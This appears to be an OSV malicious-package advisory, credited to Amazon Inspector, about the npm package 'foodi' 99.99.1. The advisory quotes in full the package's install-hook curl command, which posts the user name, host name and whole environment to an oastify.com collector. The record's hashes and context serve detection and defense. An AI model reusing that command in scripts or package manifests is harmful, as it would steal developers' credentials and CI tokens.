{"id":"MAL-2026-12383","summary":"Malicious code in foodi (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (299310eb47eac6e7f39ee1a7346de8e524d9a91cc6a07d2e8879338fa86ff5af)\npackage.json declares preinstall and postinstall lifecycle scripts that both execute `curl -X POST -k -s https://y0zhmssf65c8er7btoglvt9bg2mtakc81.oastify.com -d \"u=$(whoami)&h=$(hostname)&e=$(env)\"`. On `npm install`, the package runs `whoami`, `hostname`, and dumps the full process environment, then POSTs the collected data to a Burp Collaborator (oastify.com) subdomain over TLS with certificate verification disabled (`-k`). Environment variables on developer and CI machines routinely contain credentials, API keys, and CI tokens. The package's main module is empty, consistent with a squat/dependency-confusion payload whose sole function is install-time exfiltration.\n","modified":"2026-08-05T13:35:27.973022965Z","published":"2026-08-05T12:30:33Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-08-05T12:30:33Z","sha256":"299310eb47eac6e7f39ee1a7346de8e524d9a91cc6a07d2e8879338fa86ff5af","source":"amazon-inspector","versions":["99.99.1"],"id":"IN-MAL-2026-014684","import_time":"2026-08-05T13:08:37.160373317Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/foodi/v/99.99.1"}],"affected":[{"package":{"name":"foodi","ecosystem":"npm","purl":"pkg:npm/foodi"},"versions":["99.99.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/foodi/MAL-2026-12383.json","indicators":{"package_integrity":[{"filename":"foodi-99.99.1.tgz","hashes":{"sha512_sri":"sha512-c+Ec3BD6Fafcbto4Q5ic6OXm87Afb136ZEbTsSU/9Pjt+r6dcU6g6//d73VO60OJRmN7ru7VjSzJt5FpIKrBWQ==","sha1":"9a4cf9ffe907e042bd25177198750e43f6ea2e25"}}],"evidence_files":[{"path":"package.json","sha256":"0afddf10cceafc8097418d0206922863487caed73851db14579e7ac8ee4566e2","tlsh":"fee0ab76f8209f737ac109ee380a8f4a7a833f1b11a81806d2d7084c57dc3b65a3b12d"}]},"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.8.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}